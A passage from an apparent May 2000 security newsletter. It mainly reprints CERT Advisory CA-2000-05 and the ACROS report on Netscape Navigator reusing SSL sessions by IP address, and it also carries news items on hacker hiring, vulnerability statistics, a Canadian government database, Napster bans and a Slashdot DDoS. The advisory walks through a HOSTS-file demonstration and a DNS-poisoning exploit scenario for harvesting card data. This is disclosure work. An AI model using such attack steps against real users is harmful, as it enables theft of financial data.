early this year"...
Link: The Times of India
http://www.timesofindia.com/210500/21home5.htm
@HWA
212.0 [IND] CERT� Advisory CA-2000-05 NS Improper SSL validation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Netscape Navigator Improperly Validates SSL Sessions
http://www.cert.org/advisories/CA-2000-05.html
CERT� Advisory CA-2000-05 Netscape Navigator Improperly Validates
SSL Sessions
Original release date: May 12, 2000
Source: ACROS, CERT/CC
A complete revision history is at the end of this file.
Systems Affected
Systems running Netscape Navigator 4.72, 4.61, and 4.07. Other versions less
than 4.72 are likely to be affected as well.
Overview
The ACROS Security Team of Slovenia has discovered a flaw in the way Netscape
Navigator validates SSL sessions.
I. Description
The text of the advisory from ACROS is included below. It includes information
CERT/CC would not ordinarily publish, including specific site names and exploit
information. However, because it is already public, we are including it here as
part of the complete text provided by ACROS.
=====[BEGIN-ACROS-REPORT]=====
=========================================================================
ACROS Security Problem Report #2000-04-06-1-PUB
-------------------------------------------------------------------------
Bypassing Warnings For Invalid SSL Certificates In Netscape Navigator
=========================================================================
FULL REPORT PUBLIC
======
Affected System(s): Netscape Navigator & Communicator
Problem: Bypassing Warnings For Invalid SSL Certificates
Severity: High
Solution: Installing the Personal Security Manager or
Installing the newest Netscape Communicator (v4.73)
Discovered: April 3, 2000
Vendor notified: April 4, 2000
Last update: May 10, 2000
Published: May 10, 2000
SUMMARY
=======
Our team has discovered a flaw in Netscape Navigator that allows bypassing
of warning about an invalid SSL certificate. SSL protection is used in most
major Internet-based financial services (e-banking, e-commerce). The flaw
we have found effectively disables one of the two basic SSL functionalities:
to assure users that they are really communicating with the intended web
server - and not with a fake one.
Using this flaw, the attacker can make users send secret information (like
credit card data and passwords) to his web server rather than the real one -
EVEN IF THE COMMUNICATION IS PROTECTED BY SSL PROTOCOL.
INTRODUCTION (skip this section if you already understand how SSL works)
============
When a web browser tries to connect to a SSL-protected server, a so-called
SSL session is established. At the beginning of this session the server
presents his SSL certificate containing his public key. At this point,
browser checks the certificate for the following conditions (*):
1) Certificate must be issued by a certificate authority trusted by browser
(some are default: Verisign, Thawte etc.)
2) Certificate must not be expired (its expiry date:time must be later than
the current system date:time on the computer browser is running on)
3) Certificate must be for the server that browser is connecting to (if
browser is connecting to www.e-bank.com, the certificate must be for
www.e-bank.com)
All three conditions must be met for browser to accept the certificate. For
every condition not met, browser should display a warning to the user and
then user can decide whether connection should be established or not.
These three conditions combined provide user with assurance that his browser
is really connecting to the correct server and not to some fake server
placed on the Internet by malicious individual(s) trying to trick users to
give them credit card information, passwords and other secret information.
For example, let's take a look at a sample web e-banking system that doesn't
use SSL certificates and requires one-time password tokens for user
authentication. User connects to http://www.e-bank.com. Browser asks DNS
server for IP address of www.e-bank.com and gets 100.100.100.100. Browser
then connects to 100.100.100.100 and user is presented with login form
asking for his username and one-time password. He enters this data and
starts using e-banking services.
A simple attack (called web-spoofing) on this system is to attack the DNS
server and "poison" its entry for www.e-bank.com with attacker's IP address
99.99.99.99. Attacker sets up a web server at 99.99.99.99 that web-wise
looks exactly like the original www.e-bank.com server. User trying to
connect to www.e-bank.com will now instead connect to the attacker's server
and provide it with his one-time password. Attacker's server will use this
password to connect to the real server at 100.100.100.100 and transfer all
of the user's money to his secret Swiss bank account ;-).
This attack is successfully disabled by using SSL protocol. In that
case, when browser falsely connects to www.e-bank.com at 99.99.99.99 rather
than to 100.100.100.100, attacker's server must provide a valid certificate
for www.e-bank.com, which it can't unless the attacker has stolen the secret
key and the certificate from the real server. Let's look at three
possibilities:
1) Attacker could issue a certificate for www.e-bank.com himself (on his own
CA). That wouldn't work since his CA is not trusted by user's browser.
2) Attacker could use a stolen expired key and certificate (those are often
not protected as strongly as valid ones since one could think they can't
be used any more). That wouldn't work since browser will notice that
certificate is expired.
3) Attacker could use a valid key and certificate for some other site (e.g.
www.something.org). That wouldn't work since browser will accept only
valid certificates for www.e-bank.com.
It would seem that this problem of web-spoofing is successfully solved with
SSL certificates.
PROBLEM
=======
There is a flaw in implementation of SSL certificate checks in Netscape
Navigator.
The Flaw
--------
Netscape Navigator correctly checks the certificate conditions (*) at the
beginning of a SSL session it establishes with a certain web server.
The flaw is, while this SSL session is still alive, all HTTPS
connections to *THAT SERVER'S IP ADDRESS* are assumed to be a part of this
session (and therefore certificate conditions are not checked again).
Instead of comparing hostnames to those of currently open sessions, Navigator
compares IP addresses. Since more than one hostname can have the same IP
address, there is a great potential for security breach.
This behavior is not in compliance with SSL specification.
DEMONSTRATION
=============
The following will try to demonstrate the flaw. It is assumed that for
redirecting user's web traffic, the attacker will generally use "DNS
poisoning" or reconfiguring routers, while in our demonstration we will
use the HOSTS file on client computer to get the same effect and make it
easier to reproduce the flaw.
In this demonstration, we will make Navigator open Thawte's homepage over
secure (HTTPS) connection while requesting Verisign's home address at
https://www.verisign.com.
Thawte's and Verisign's homepages are used as examples - this would work
just the same on any other secured web sites.
1) First, add the following line to the local HOSTS file on the computer
running the Navigator and save it:
207.240.177.177 www.verisign.com
This will make the computer (and, consequently, the browser) think that IP
address of www.verisign.com (which is actually 205.139.94.60) is in fact
207.240.177.177 (which is actually IP address of www.thawte.com).
At this point it is important to note that SSL, if correctly implemented,
provides protection against such "domain name spoofing", because while the
browser will connect to the wrong server, that server will not be able to
provide a valid SSL certificate and the SSL session will not be
established (not without user being warned about the certificate).
2) Close all instances of Navigator to clean any cached IP addresses.
3) Open Navigator and go to https://www.thawte.com. It works as it should -
Thawte's server provides a valid SSL certificate for its hostname
(www.thawte.com) and so the SSL session is established.
4) With the same instance of Navigator, go to https://www.verisign.com. Now
watch the Thawte's homepage appear again WITHOUT ANY WARNINGS!
What happened here? In step 3), Navigator looked up the IP address for
www.thawte.com (from the DNS server) and found 207.240.177.177. It tried to
establish a SSL session with that IP address and correctly checked all three
certificate conditions (*) - indeed, if any of them weren't true, a warning
would pop up.
In step 4), Navigator looked up the IP address for www.verisign.com (this
time from HOSTS file, but it could easily have been from the same DNS server)
and found again 207.240.177.177. Now, since there was already one SSL session
open with that IP address, Navigator *INCORRECTLY* decided to use that
session instead of establishing another one.
EXPLOIT
=======
This exploit will show how the flaw could be used to gather user's secret
information.
Assume there is a web bookstore at www.thebookstore.com. Users go to
http://www.thebookstore.com (via normal HTTP connection), browse the
books and add them to their virtual shopping baskets. At the check-out,
they are directed to a secure order form (e.g.
https://www.thebookstore.com/order_form.html) where they enter their
personal and credit card information which is then submitted (again via
secure HTTPS connection) to the server. This is a typical web e-commerce
concept.
Assume that IP address of www.thebookstore.com is 100.100.100.100.
The attacker sets up his own web server with IP address 99.99.99.99 and
installs on it a valid SSL certificate for host www.attacker.com (he could
have purchased this certificate from e.g. Verisign if he owns the domain
attacker.com; he could have stolen the certificate or he could have broken
into a web server with a certificate already installed).
The attacker makes this web server function as a gateway to
www.thebookstore.com - meaning that all requests are forwarded to
www.thebookstore.com, so virtually this server "looks and feels" exactly like
the real www.thebookstore.com. There is just one difference: the page before
the order form (e.g. http://www.thebookstore.com/basket.html)
contains a small (1x1) image originating from https://www.attacker.com
(secure HTTPS connection).
Then, the attacker "poisons" a heavily used DNS server so that it will return
99.99.99.99 for requests about www.thebookstore.com (normally it returns
100.100.100.100).
What happens then?
All users of that DNS server who will try to visit (via normal HTTP)
http://www.thebookstore.com will connect to 99.99.99.99 instead of
100.100.100.100 but will not notice anything because everything will look
just the way it should. They will browse the books and add them to their
shopping baskets and at check-out, they will be presented with the order form
https://www.thebookstore.com/order_form.html.
But the previous HTML page containing the hyperlink to the order form will
also contain a small (1x1) image with source https://www.attacker.com/a.gif.
Navigator will successfully download this image and for that it will
establish a SSL session with www.attacker.com. This session then stays open.
When the order form is accessed, Navigator tries to establish another SSL
session, this time to www.thebookstore.com. Since DNS server claims this
server has the same IP address as www.attacker.com (99.99.99.99), Navigator
will use the existing SSL session with 99.99.99.99 and will not check the
certificate.
The result: Navigator is displaying a SECURE ORDER FORM that it believes to
be originating from the genuine server www.thebookstore.com while in fact
it is originating from the fake one. No warning about an invalid certificate
is issued to the user so he also believes to be safe.
When user submits his secret information, it goes to (through) the attacker's
server where it is collected for massive abuse.
For users to notice the foul play they would have to look at the certificate
properties while on a "secure" page https://www.thebookstore.com/...
The properties would show that the certificate used was issued for host
www.attacker.com.
Also, monitoring network traffic would show that the server is not at
100.100.100.100 where it should be but rather at 99.99.99.99.
It is a very rare practice to check any of these when nothing suspect is
happening.
Notes
-----
It should be noted that in the previous exploit, if the users tried to
access https://www.thebookstore.com over secure (HTTPS) connection from
the very start, Navigator would issue a warning. It is imperative for the
exploit to work that some time *before* the first secure connection to
https://www.thebookstore.com a successful secure connection is made to
https://www.attacker.com. That's why a valid certificate must be installed
on www.attacker.com.
Also, it should be noted that Navigator's SSL sessions don't last forever.
We haven't been able to predict the duration of these sessions
(it seems to be depending on many things like inactivity time, total time
etc.) and we also haven't investigated the possible effects of SSL
session resuming.
SOLUTION
========
Netscape has (even prior to our notification - see the Acknowledgments
section) provided a Navigator Add-on called Personal Security Manager (PSM),
freely downloadable at:
http://www.iplanet.com/downloads/download/detail_128_316.html
Installation of PSM, as far as we have tested it, corrects the identified
flaw.
Netscape Communicator (v4.73) currently includes the fix for this
vulnerability. It is available for download at:
http://home.netscape.com/download/
WORKAROUND
==========
Navigator/Communicator users who can't or don't want to install PSM can use
a "manual" method to make sure they are not under attack:
When visiting an SSL-protected site, double click on the lock icon (bottom
left corner) or the key icon (in older browsers) and see whether the
certificate used for the connection is really issued for the correct
hostname. E.g. If you visit https://www.verisign.com, make sure the
certificate used is issued for www.verisign.com and not for some other
hostname.
ADVISORY
========
It is important to emphasize that the flaw presented completely compromises
SSL's ability to provide strong server authentication and therefore poses
a serious threat to Navigator users relying on its SSL protection.
Users of web services
---------------------
Netscape Navigator/Communicator users who are also users of any critical web
services employing Secure Sockets Layer (SSL) protection to provide secrecy
and integrity of browser-server communication are strongly advised to
install Personal Security Manager or upgrade to Communicator 4.73 and thus
disable this vulnerability.
Main examples of such critical web services are:
- web banking systems (especially the ones using passwords for
authentication - even one-time passwords),
- web stores (especially the ones accepting credit card data) and
- other web-based e-commerce systems.
Providers of web services
-------------------------
Providers of critical web services employing Secure Sockets Layer (SSL)
protection to provide secrecy and integrity of browser-server communication
should advise their users to install Personal Security Manager or upgrade to
Communicator 4.73 and thus disable this vulnerability.
Since this vulnerability allows for the type of attack that can completely
bypass the real/original web server, there are no technical countermeasures
which providers of web services could deploy at their sites.
Web services using client SSL certificates for user authentication
------------------------------------------------------------------
This vulnerability does NOT allow the attacker to steal client's SSL key
and thus execute the man-in-the-middle attack on web services using client
SSL certificates for user authentication. It still does, however, allow
the attacker to place a fake server (an exact copy) and collect other
information users provide (including the data in their client SSL
certificates).
TESTING RESULTS
===============
Tests were performed on:
Communicator 4.72 - affected
Communicator 4.61 - affected
Navigator 4.07 - affected
ACKNOWLEDGMENTS
===============
We would like to acknowledge Netscape (specifically Mr. Bob Lord and Mr.
Kevin Murray) for prompt and professional response to our notification of
the identified vulnerability and their help in understanding the flaw and
"polishing" this report.
We would also like to acknowledge Mr. Matthias Suencksen of Germany, who
has discovered some aspects of this vulnerability before we did (back in
May 1999).
REFERENCES
==========
Netscape has issued a Security Note about this vulnerability under a title
"The Acros-Suencksen SSL Vulnerability" at:
http://home.netscape.com/security/notes/index.html
SUPPORT
=======
For further details about this issue please contact:
Mr. Mitja Kolsek
ACROS, d.o.o.
Stantetova 4
SI - 2000 Maribor, Slovenia
phone: +386 41 720 908
e-mail: mitja.kolsek@acros.si
PGP Key available at PGP.COM's key server.
PGP Fingerprint: A655 F61C 5103 F561 6D30 AAB2 2DD1 562A
DISTRIBUTION
============
This report was sent to:
- BugTraq mailing list
- NTBugTraq mailing list
- Win2KSecAdvice mailing list
- SI-CERT
- ACROS client mailing list
DISCLAIMER
==========
The information in this report is purely informational and meant only for
the purpose of education and protection. ACROS, d.o.o. shall in no event be
liable for any damage whatsoever, direct or implied, arising from use or
spread of this information.
All identifiers (hostnames, IP addresses, company names, individual names
etc.) used in examples and exploits are used only for explanatory purposes
and have no connection with any real host, company or individual. In no
event should it be assumed that use of these names means specific hosts,
companies or individuals are vulnerable to any attacks nor does it mean that
they consent to being used in any vulnerability tests.
The use of information in this report is entirely at user's risk.
COPYRIGHT
=========
(c) 2000 ACROS, d.o.o., Slovenia. Forwarding and publishing of this document
is permitted providing all information between marks "[BEGIN-ACROS-REPORT]"
and "[END-ACROS-REPORT]" remains unchanged.
=====[END-ACROS-REPORT]=====
II. Impact
Attackers can trick users into disclosing information (potentially
including credit card numbers, personal data, or other sensitive
information) intended for a legitimate web site, even if that web
site uses SSL to authenticate and secure transactions.
III. Solution
Install an update from your vendor.
Appendix A lists information from vendors about updates.
If you are a DNS administrator, maintain the integrity of your DNS
server
One way to exploit this vulnerability, described above, relies on the
ability of the attacker to compromise DNS information. If you are a
DNS administrator, making sure your DNS server is up-to-date and free
of known vulnerabilities reduces the ability of an intruder to execute
this type of attack. Administrators of BIND DNS servers are encouraged
to read
http://www.cert.org/advisories/CA-2000-03.html
Validate certificates at each use
Despite the existence of this flaw, it is still possible to guard
against attempted attacks by validating certificates manually each
time you connect to an SSL-secured web site. Doing so will substantially
reduce the ability of an attacker to use flaws in the DNS system to
bypass SSL-authentication.
Appendix A. Vendor Information
iPlanet
Information about this problem is available at
http://home.netscape.com/security/notes/index.html
Microsoft
None of our products are affected by this vulnerability.
The CERT Coordination Center thanks the ACROS Security Team of Slovenia
(Contact: mitja.kolsek@acros.si), for the bulk of the text in this advisory.
Shawn Hernan was the primary author of the CERT/CC portions of this document.
This document is available from: http://www.cert.org/advisories/CA-2000-05.html
CERT/CC Contact Information
Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday
through Friday; they are on call for emergencies during other hours, on U.S.
holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email. Our public
PGP key is available from
http://www.cert.org/CERT_PGP.key
If you prefer to use DES, please call the CERT hotline for more information.
Getting security information
CERT publications and other security information are available from our web site
http://www.cert.org/
To be added to our mailing list for advisories and bulletins, send email to
cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the
subject of your message.
* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and
Trademark Office.
NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software Engineering
Institute is furnished on an "as is" basis. Carnegie Mellon University makes no
warranties of any kind, either expressed or implied as to any matter including,
but not limited to, warranty of fitness for a particular purpose or merchantability,
exclusivity or results obtained from use of the material. Carnegie Mellon University
does not make any warranty of any kind with respect to freedom from patent, trademark,
or copyright infringement.
Conditions for use, disclaimers, and sponsorship information
Copyright 2000 Carnegie Mellon University; portions Copyright 2000 ACROS, d.o.o., Slovenia.
Revision History
May 12, 2000: Initial release
@HWA
213.0 [MM] IBM will only hire immitation hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Packetstorm and ZDNet
http://www.anchordesk.co.uk/anchordesk/commentary/columns/0,2415,7102547,00.html
May 16, 2000
IBM will only hire immitation hackers
David Binney, director of corporate security for IBM stated, "IBM would never consider hiring a
reformed hacker. It would be like hiring a burglar to institute a burglar system in your house. You
wouldn't do it." When Lewis Koch, a journalist with ZDNET UK, attempted to ascertain if there
were any ulterior motives for the statement, Binney backed out of the interview. Read the entire
story (below). Thanks to Jane Oliver at ZDNET for the submission.
- Packetstorm
ZDnet;
Commentary Box
May 15, 2000
What the hack did he say?
"IBM would never consider hiring a reformed
hacker. It would be like hiring a burglar to
institute a burglar system on your house. You
wouldn't do it." So said David Binney, director of
corporate security at IBM, in Solar Sunrise, a
video produced last year by the Federal Bureau of
Investigation and the National Infrastructure
Protection Center, ostensibly to deter people from
hacking.
By Lewis Z. Koch
In Binney's view, hackers, like burglers, break in with the intent to
steal. IBM won't hire you, he said, and neither will any responsible
computer security firm. Hack and you'll never work in this town again.
Don't believe it, Binney. The town and the times are a-changin'.
Testing the thesis
A number of top-tier, high-profile firms feel differently about hackers.
Evidence? Look at the recent joint venture among a group of hackers
known as the L0pht, Compaq Computer and Forrester Research that
involves $10 million in venture capital. There's nothing "reformed"
about the L0pht; members wear the mantle of hacker proudly, says
Space Rogue, a L0pht member in good standing.
Although not a hacker, reformed or otherwise, Steve Lutz,
president of WaySecure Consulting, hires reformed hackers. His
company offers a full range of computer security consulting, including
evidence gathering, risk assessment, security testing and training.
Among the hundreds of clients he and his hackers have served are
Chase Manhattan, American Express, Morgan Stanley Dean Witter,
insurance giant Transamerica, TIAA-CREF, the U.S. Navy and the
U.S. Army - organisations with serious items to protect: money,
stocks, bombs.
"I hired several hackers," Lutz says, "the most famous, perhaps
notorious, being Mark Abene, a.k.a. Phiber Optik. I brought Mark into
the security consulting world by hiring him when he was released
from prison. He worked for me for about two years and then started
his own company, called Crossbar Security. Mark is a perfect
example of the nation's most feared hacker turning around and
providing a valuable service to the commercial sector and reaping the
rewards that go with it."
Lutz says hiring hackers as consultants can be "highly rewarding.
This is true for both the clients we serve and... the hackers
themselves. Many young, talented hackers are bored and looking for
something to do. By providing them with a constructive objective and
rewarding them monetarily, we help focus them in a positive direction
that keeps them busy and out of trouble."
The idea, as Lutz sees it, is to manage them and teach them
business skills, not banish or outlaw them.
Inquiring minds
Could Binney have had an ulterior motive for his statement? IBM has
what it calls an "ethical hackers" unit that will, for $15,000 to
$40,000, according to the company, "simulate a real intruder's
attack, but in a controlled, safe way." IBM's Internet Security
Assessments, for $40,000 to $200,000, will tell companies if their
Web sites are vulnerable and, if so, shore the sites up.
I asked computer security people all over the Net what they would
like me to ask Binney. But after initially agreeing to an interview on
Feb. 8, Binney changed his mind and has since been unavailable for
comment, despite numerous phone calls, messages and e-mails.
The questions, though, have value in themselves...
Carole Fennelly is a security consultant and partner at Wizard's
Keys, a Tinton Falls, N.J., consulting company specializing in
computer systems security. Fennelly had three sets of questions:
1.If IBM doesn't use hackers for penetration tests, then what is
so special about its test? If it is merely testing for known
vulnerabilities using a package like ISS Scanner [which
uncovers vulnerabilities likely to be exploited during attempts
to attack a network and provides the necessary corrective
actions], why should a company pay big bucks for that? Why
couldn't companies just run the scan themselves?
2.Has IBM ever encountered a site with really iron-clad
security? If so, what did IBM put in the report? IBM can
answer that one without naming the company, just as
physicians mask the identities of their patients, while still
providing the data necessary for studies.
3.When IBM makes recommendations, does it refer the client to
a vendor with which it has a partnership? Does it offer to do
the work itself? They're not using the audit as a marketing
opportunity, are they? Audits can be legitimate opportunities
for a company to prove its worth to the client. It can also
become a con job targeting overworked and understaffed
technical administrators.
Sage security advice
Matthew G. Devost, a senior information security analyst at Security
Design International, a firm providing security consulting services to
international corporations and governments, warns against using
large firms that offer prepackaged security solutions. "With large
consulting or product companies, the security consulting team is
often used as a mechanism for pushing other products or services,"
Devost says.
He also cautioned against an assessment team that benefits from
future product sales or follow-up implementation support. "Pay close
attention to methodology," Devost says. "If a company offers a quote
without first understanding your network, their assessment can't
really be trusted."
Other things that don't bode well, Devost says, are the use of a
single commercial product or reliance on assessment tools.
Devost says customers should check the qualifications of the
security team. "Will the names provided be directly involved in your
assessment? Beware the bait-and-switch technique, where a team of
senior security engineers is offered up, but replaced by a team of
recent college graduates at the last minute."
Cast a wide net, Devost says. "There are a hundred reasons why
you should avoid using a large consulting company to perform a
security assessment... [which] will become apparent only when you
broaden the spectrum of firms you solicit for quotes. Pay very close
attention to the technical substance of their proposals."
So, contrary to what Binney said, with all the problems around the
Internet - denial-of-service attacks out of nowhere, computer
malfunctions and software vulnerabilities - there is a growing market
for reformed hackers, one that's lucrative and fun and, best of all,
legal.
If you want to respond to this piece, talk to the author, voice an
opinion or just tell us how we can improve AnchorDesk UK, come to
our TalkBack forums and have your say ...
@HWA
214.0 [IND] BUGTRAQ: "Vulnerability statistics database"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.securityfocus.com/frames/?content=/vdb/stats.html
This is interesting, but I feel they should have included more relevant
information like how many units are in production use and how many units
are home or business based etc in this analysis. - Ed
Follow url for more stats and graphs etc.
Number of OS Vulnerabilities by Year
OS 1997 1998 1999 2000
Debian 2 2 29 5
FreeBSD 4 2 18 6
HP-UX 8 5 7 3
IRIX 26 13 8 3
Linux (aggr.) 10 23 84 30
MacOS 0 1 5 0
MacOS X Server 0 0 1 0
NetBSD 1 4 10 3
OpenBSD 1 2 4 2
RedHat 5 10 38 17
Solaris 24 31 34 6
Windows 3.1x/95/98 1 1 46 11
Windows NT 4 6 99 34
@HWA
215.0 [MM] Big Brother has your file
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.canoe.ca/TorontoNews/ts.ts-05-17-0016.html
Wednesday, May 17, 2000
Big Brother has your file
Huge data bank worries privacy watchdog
By SEAN DURKAN, OTTAWA BUREAU
OTTAWA -- Big Brother is watching you.
The federal government has "a de facto citizen profile" on virtually
everyone living in Canada, Privacy Commissioner Bruce Phillips
revealed yesterday.
The massive data bank, which is vulnerable to misuse, is run by
Jane Stewart's Human Resources and Development Canada --
the same department under fire for its handling of $1 billion in job
grants.
The data bank contains as many as 2,000 pieces of information on
each of 33.7 million individuals, Phillips said in his annual report to
Parliament.
The dossier, which tracks Canadians from cradle to grave and is
never purged, includes information about each person's education,
marital status, ethnic origin, mobility, disabilities, income tax,
employment and welfare history.
TAX RETURNS
The information is taken from income tax returns, child tax
benefits, immigration and welfare files, the National Training
Program, Canadian Job Strategy, employment services,
employment insurance, job records and the social insurance
master file.
"Continually centralizing and integrating so much personal data on
almost every person in Canada poses significant risks to our
privacy," Phillips said.
Privacy is further endangered because the information can be
given out to non-government researchers, Phillips said.
Most Canadians would be surprised to know their tax returns can
be shared in this way, he said.
HRDC's files are not subject to laws preventing the public release
of any individual's information.
Phillips said the database is "a hazard" because it creates a
temptation for governments to develop profiles, "raising fears that
data could be used to make decisions or predictions about
individuals ... to the detriment of individual rights."
ASSURANCES
Privacy commissioners have always assured Canadians there was
no such central file. An audit which began two years ago has
proved them wrong and Canadians should be concerned, Phillips
said.
The "extraordinarily detailed" central databank is called the
Longitudinal Labour Force File.
There are proposals to make the file even more comprehensive by
adding data on social assistance recipients from additional
provinces and territories, and data from the Canada Student Loan
Program, the Canada Pension Plan and the Old Age Security
Program.
The central file has gradually built up with government
reorganization, which has turned HRDC into "a virtual behemoth"
that has taken over numerous social, employment and training
programs from other departments.
Phillips said HRDC has responded to his concerns by saying the
data is vital to help it develop policy, manage the effectiveness of
its "interventions" and improve programs and service delivery.
-=-
Ottawa Citizen;
http://www.ottawacitizen.com/national/000517/4116449.html
Vast database details every
Canadian's life
Federal watchdog says some files hold 2,000
bits of information
Ian MacLeod
The Ottawa Citizen
The federal government has
quietly created a massive
computer database with
intimate details about millions
of Canadians, including
income, employment,
education and family status,
federal Privacy Commissioner
Bruce Phillips revealed
yesterday.
"This is an enormous database
with enormous amounts of
information about each one of
us," the nation's chief privacy
watchdog said following the
release of his annual report to
Parliament on the state of personal privacy in Canada.
"Every one of us is covered in this file in one way or another. They have a
complete record of you if you've had any contact anywhere with any (of a
number of government departments and programs) ... which tells them how
your life is progressing."
The Longitudinal Labour Force File, managed by Human Resources
Development Canada, contains detailed data on 33.7 million living and dead
Canadians. Some individual files contain as many as 2,000 bits and pieces of
vital personal information, Mr. Phillips said.
The labour file was established about 15 years ago by Employment and
Immigration Canada and is used to research and evaluate the effectiveness of
the federal employment insurance program.
The information is gleaned from other government data banks and includes
details from tax returns, child tax benefit files, provincial and municipal
welfare files, federal jobs, job training and employment programs and
services, employment insurance files and the social insurance master file.
Mr. Phillips said there are proposals to expand the file to include additional
data on social assistance recipients from provinces and territories, the
Canada Student Loan Program, the Canada Pension Plan and Old Age
Security Program.
"Successive privacy commissioners have assured Canadians that there was
no single federal government file, or profile about them," said Mr. Phillips.
"We were wrong -- or not right enough for comfort.
"I don't question that they had, and they have, good reasons for doing this
and that it is useful information in terms of improving the quality of their
programs. I am not suggesting either that they've done anything unlawful
here. They are complying with the strict letter of the law as we understand it.
"But there are serious problems here."
Although an HRDC Web site contains a brief description about the labour
file, Mr. Phillips said much more has to be done to let Canadians know
about the extent of the government's surveillance of its citizens.
"Transparency and knowledge about what the government is doing is
important."
A senior HRDC official yesterday defended the file and said the department
has been trying to address Mr. Phillips' concerns, including agreeing to purge
individual data from the file after 25 years.
"We have taken his concerns seriously," said Bob Wilson, HRDC's
director-general of evaluation and data development. "We're not unmindful
of the privacy concerns surrounding the database.
"On the other hand, it's really important to Canadians that we do policy
research and evaluation so that we can get programs that meet their needs.
So, as in all of these thorny public policy issues, there's a saw-off about
where do you draw the line in respect of that."
He said specific information in the database is electronically masked to hide
an individual's identity and that only a handful of HRDC officials have access
to the technological hardware needed to unmask the data. He acknowledged
the masked data is sometimes given to private firms for research and
analysis.
"We're concerned about maintaining the privacy of individuals and we've
done a large number of things to protect that," said Mr. Wilson. "We,
perhaps not wisely, but nevertheless, have relied on the fact that we've been
doing this for 15 years and never had a problem with it, never had even a
hint of a (security) breach."
Mr. Phillips said he has no reason to believe current government officials are
abusing the information contained in the file, though he questions what future
officials might do and whether any officials really need all of the information
the file contains.
In effect, he said, the government is compiling a de facto profile of virtually
every citizen in Canada.
"My problem here is ... the Privacy Act at the moment is insufficient to
prevent these kinds of informational collections," he said. "The Canadian
public believes, for example, that when they send their tax information, it
doesn't go out of the tax department. Well, in fact, it does, many times and
to many places. There's something like 200 informational exchange
agreements between Revenue Canada and various other agencies, plus other
governments."
In the two years since the Office of the Privacy Commissioner found out
about the labour file, Mr. Phillips said he has tried, unsuccessfully, to
persuade HRDC officials to enact legislation to control the collection,
handling and access to the information.
"I said years ago, the fear is not Big Brother, it's thousands of little brothers,
all of whom have" increasing technological ability to monitor the personal
lives of Canadians.
"But there is a Big Brother factor as well, and I think the Longitudinal Labour
Force File is an example of the kind of thing that modern technology makes
possible. We should know about it. We should know they're doing it and
they should have to do it under very tightly written legal restraints about the
usage of that information."
But Mr. Wilson said HRDC officials believe current laws and regulations
offer many of the protections Mr. Phillips wants.
"We really need to sit down with him to find out exactly what he would like
us to do by way of legislative framework," he said.
Longitudinal Labour Force File
Description: The bank contains all of the following information: Social
Insurance Number, sex, date of birth, name and initials of the person. It may
contain information on income, periods of employment and unemployment,
eligibility of employment insurance and or social assistance, family situation,
education, National Training Program courses taken and other employment
services received.
Consistent Usee: ...It may be provided to private sector firms for planning,
statistics, research and situations.
@HWA
216.0 [MM] Napster gets tough with Metallica
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.zdnet.com/zdnn/stories/news/0,4586,2568446,00.html
Napster gets tough with Metallica fans
A Napster message board goes dark after a user posts a hack for banned users.
It was either that or go out of business, a company insider said.
By Marilynn Wheeler, ZDNet News
May 12, 2000 5:11 AM PT
Banned Napster users who figured out a way to get back onto the music download
site were foiled late Thursday when instructions were removed from a Napster
message board.
The "Circumventing Napster Bans" user forum was shut down and in its place
was a warning from the company after ZDNet News published a link to the forum.
"Any posts regarding the circumvention of bans placed by Napster will be
deleted and the username will be banned," Napster told visitors to the forum.
"The IP will be logged, and a second offense will trigger an IP ban on the
individual's account."
"The Napster discussion boards are moderated, and they have a policy of
removing any user posts related to working around the user blocks regarding
Metallica," said Napster spokesman Dan Wool.
Doing battle online
Last week Metallica, which is suing Napster for copyright violation, produced
the names of hundreds of thousands of fans who had traded the band's music
online. Napster responded by banning 317,377 users on Wednesday.
The ostracized fans complained they'd been tricked into downloading the latest
version of Napster, which had installed tracking identification on their
computers. Within hours, a way to get back online was posted in a Napster forum.
A user who asked not to be identified protested in an Internet Relay Chat with
one of Napster's developers.
"(The instructions) went down because our PR firm told us to take them down,"
said the developer, identified as "nocarrier." "Having that information on our
boards gives the impression to the world that we support the removal of our lock."
Crying censorship
"So it was removed," replied the user, "MindRape." "But that's censorship."
It's called protecting your company, the developer said. "We will GO OUT OF
BUSINESS for s--- like that! Delete the post, or lose the court battle, and
you lose your napster! This is reality man!"
"You had to do certain things to show you applied effort, but to CENSOR,"
the user replied. "I dunno man, I think that's Orwellian. Well, good luck."
"Thanks. We need it," the developer replied.
@HWA
217.0 [IND] The Slashdot DDoS attack: What happened?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by GTO (http://www.g-t-online.com/)
http://slashdot.org/article.pl?sid=00/05/17/1318233&mode=thread
Posted by CmdrTaco on Wednesday May 17, @10:00AM
from the from-the-horses-mouth dept.
What follows this introduction is a rough summary of the crazy hell that
we endured with the intermittant DDoS[?] attacks we experienced last
Thursday through Saturday. I'm sorry it took this long to put this
together and tell you what happened, but as these things go, we were too
busy trying to solve the problem to waste time talking about it. Big
thanks to Andover.Net's Netops PatL, Martin and Liz, as well as
Slashcode-wranglers PatG, Chris, Marc, Kurt and CowboyNeal, plus scoop
(from freshmeat) and others who chimed in along the way. Tomorrow is
part2: A good description of how the new Slashdot @ Exodus works.
What follows is more-or-less Pat "BSD-Pat" Lynch's account of the DDoS...
Pat is our super 31337 BSD Junkie sysadmin. He wants everyone to know that
the timeline below is little screwy, but things are more or less in
sequential order. Things might not be exactly perfect, but hey, what do
you expect after 30 hours without sleep?
Having moved the day before, none of us were truly familiar with exactly
how the new hardware would handle the full burden of being 'slashdot.org'.
The cluster (known affectionately as The Matrix) had handled its premiere
day with flying colors, but we didn't really have an accurate feel of how
things would react. Combine this with a couple of extremely high traffic
